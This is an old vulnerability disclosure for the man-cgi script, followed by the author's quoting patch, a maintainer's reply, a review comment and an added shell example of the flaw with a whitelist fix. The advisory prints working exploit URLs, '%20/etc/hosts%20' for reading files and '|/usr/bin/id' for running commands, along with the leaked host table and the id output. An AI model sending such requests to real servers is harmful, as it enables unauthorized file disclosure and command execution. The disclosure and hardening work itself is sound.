Upon researching several possible CGI-based man holes I ran across the following bugged code:

  © 1994-1999 Man-cgi 2.00, Panagiotis Christias
  © 1995 Man-cgi 1.15 Modified for Solaris 2.3, David Adams
  © 1994 Man-cgi 1.15, Panagiotis Christias
  © 1996 Man-cgi 1.15 Ported to linux and maintained by Tom Vrana

The issue is with the filtering of %20 (or any other hex-encoded URL character). Adding one in front of a known file name will allow you to view the file with the permissions of the web server. In some implementations it is also possible to specify the path to a known executable, and thus you are able to run that executable, for example /usr/bin/id. These issues may be used to disclose sensitive information on your server or possibly allow someone to run any command they want on it. If you have further questions, mail me.

----------------------------------------------------------

  http://www.ntua.gr/cgi-bin/man-cgi?%20/etc/hosts%20

reveals the following:

  #
  # Internet host table
  #
  127.0.0.1        localhost
  #147.102.222.210 achilles.noc.ntua.gr achilles
  147.102.222.210  achilles.noc.ntua.gr achilles
  147.102.222.211  patroklos.noc.ntua.gr patroklos
  147.102.222.230  ulysses.noc.ntua.gr ulysses
  # Required for backup
  147.102.222.250  menelaos.noc.ntua.gr menelaos

-----------------------------------------------------------

  http://xxx/cgi-bin/man-cgi?/usr/bin/id

or

  http://xxx/cgi-bin/man-cgi?|/usr/bin/id

returns:

  uid=99(nobody) gid=99(nobody) groups=99(nobody)

-----------------------------------------------------------

Below are the author's patches, and comments from one of the people who has modified the script to operate on other OSes.

Sorry for my delayed reply, too much work to do and too much email to read and reply to. Here is a quick fix:

*************** *** 185,191 **** { print "
"; \ printf("NOTE: man page for %s may be in the wrong place. \n",PAGE); \ printf("Try all sections and all optional pages\n",URL,PAGE); } }' \ ! PAGE=$COMMAND URL=$MANCGI fi; ---- 178,184 ---- { print "
"; \ printf("NOTE: man page for %s may be in the wrong place. \n",PAGE); \ printf("Try all sections and all optional pages\n",URL,PAGE); } }' \ ! PAGE="$COMMAND" URL="$MANCGI" fi;

The values of the PAGE and URL variables should be quoted. This is the first step. I should correct several other parts of the script. I was quite naive when I wrote man-cgi several years ago :)

You're welcome to test the security of http://www.ntua.gr/cgi-bin/man-cgi

Regards,
Panagiotis

--
Panagiotis J. Christias        Network Management Center
P.Christias@noc.ntua.gr        National Technical Univ. of Athens, GREECE

----------------------------------------------------------------

On Thu, Feb 22, 2001 at 10:52:41AM -0000, David Adams wrote:

Sorry to be so dim, but I really could not fathom the point you were trying to make with your first email. Only now do I understand the significance of putting in the %20 (space character). I still don't understand your anonymity, but I guess I can live with it.

The man-cgi script was written by Panagiotis Christias, and I made some enhancements and got it working for Solaris. It works so well that no one (AFAIK) has bothered to re-write it for Perl.

I am grateful that you have pointed out this security loophole to us. It is up to you whether you report it through the normal channels or not. As it can be used to read the /etc/passwd file it could be a real security threat.

I will look at the script and see if I can find a solution, I hope Panagiotis will do the same.

--
David Adams
Computing Services
Southampton University
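Review bot: quoting PAGE="$COMMAND" URL="$MANCGI" in the changed line stops a COMMAND value containing whitespace from splitting into a separate awk operand (which is how a decoded " /etc/hosts " became an input file that awk read and the CGI echoed back), but it does not constrain what COMMAND may contain. The "|/usr/bin/id" request shown above succeeds on some installations, so the same value evidently reaches a shell or man invocation elsewhere in the script, as the author's own remark that several other parts need correcting suggests. Suggest validating COMMAND once, right after URL-decoding and before any of these uses, against a whitelist of manual page name characters (letters, digits, ".", "_", "+", "-") and rejecting the request otherwise, rather than relying on quoting being remembered at every expansion.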
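The mechanism behind the %20/etc/hosts%20 request and the quoting fix above, as an added example written for this page (it is not the man-cgi script, whose surrounding code is not shown here). The awk program, the "man output" it is fed, and the temporary file it reads are constructed stand-ins; the only thing taken from the patch is the shape of the unquoted versus quoted PAGE=$COMMAND operand. The whitelist function at the end is an assumed hardening step, not something the script currently does.

```shell
#!/bin/sh
# Added example, not the man-cgi script: why an unquoted PAGE=$COMMAND turns a
# hex-encoded query into a file read, what the quoting fix changes, and what a
# whitelist check looks like. Everything below is constructed for illustration.

# Decode %XX sequences (and '+') the way a CGI script must before using
# QUERY_STRING: "%20/etc/hosts%20" becomes " /etc/hosts ".
urldecode() {
    printf '%s' "$1" | awk '
        BEGIN { for (i = 1; i < 256; i++) hex[sprintf("%02X", i)] = sprintf("%c", i) }
        {
            s = $0; out = ""
            gsub(/\+/, " ", s)
            while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
                out = out substr(s, 1, RSTART - 1) hex[toupper(substr(s, RSTART + 1, 2))]
                s = substr(s, RSTART + 3)
            }
            print out s
        }'
}

# Constructed stand-in for the text the real script pipes from man(1) into awk.
MAN_OUTPUT='No manual entry for that page'

# Pre-patch shape: PAGE=$1 is unquoted. A value " /etc/hosts " is split by the
# shell into the words "PAGE=" and "/etc/hosts"; awk takes the second word as an
# input file, reads it instead of stdin, and the CGI echoes it back to the client.
render_unquoted() {
    printf '%s\n' "$MAN_OUTPUT" | awk '{ print "line: " $0 }' PAGE=$1
}

# Patched shape: with "$1" quoted the whole value stays one word, so awk sees
# only a variable assignment and reads the man output from stdin as intended.
render_quoted() {
    printf '%s\n' "$MAN_OUTPUT" | awk '{ print "line: " $0 }' PAGE="$1"
}

# Assumed hardening (not in the script): accept only characters that can appear
# in a manual page name, so neither " /etc/hosts " nor "|/usr/bin/id" ever
# reaches a command line, quoted or not. Returns 0 if acceptable, 1 otherwise.
valid_page_name() {
    case $1 in
        '' | *[!A-Za-z0-9._+-]* ) return 1 ;;
        * ) return 0 ;;
    esac
}

# Stand-alone demonstration against a constructed file, never /etc/hosts itself.
demo() {
    f=$(mktemp)
    printf '127.0.0.1 localhost\n' > "$f"
    q=$(urldecode "%20${f}%20")
    echo "unquoted:  $(render_unquoted "$q")"
    echo "quoted:    $(render_quoted "$q")"
    if valid_page_name "$q"; then echo "whitelist: accepted"; else echo "whitelist: rejected"; fi
    rm -f "$f"
}

if [ "${1:-}" = demo ]; then demo; fi
```

Run it as "sh example.sh demo": the unquoted line prints the contents of the temporary file, the quoted line prints the stand-in man output, and the whitelist rejects the decoded value outright. The whitelist is the check worth adding regardless of the quoting, because it fails closed before the value is ever interpreted by awk, man, or a shell.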